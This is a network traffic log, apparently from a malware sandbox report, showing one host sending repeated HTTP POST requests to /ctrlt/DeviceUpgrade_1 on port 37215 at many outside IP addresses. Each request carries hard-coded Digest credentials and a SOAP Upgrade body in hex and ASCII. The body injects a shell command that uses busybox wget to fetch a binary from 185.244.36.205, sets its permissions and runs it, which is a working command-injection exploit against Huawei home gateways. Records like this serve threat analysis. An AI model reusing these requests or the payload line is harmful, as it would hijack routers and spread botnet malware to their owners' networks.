                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1269192.168.2.1556414186.122.71.15837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397381067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1270192.168.2.1538574102.142.120.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397389889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1271192.168.2.1560664156.176.10.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397411108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1272192.168.2.155917637.172.117.24137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397428036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1273192.168.2.1560504190.55.166.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397481918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1274192.168.2.154766041.239.12.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397497892 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1275192.168.2.1545428102.78.40.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397519112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1276192.168.2.1558448190.24.60.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397536039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1277192.168.2.1549360102.52.142.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397536039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1278192.168.2.1542736138.157.213.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397540092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
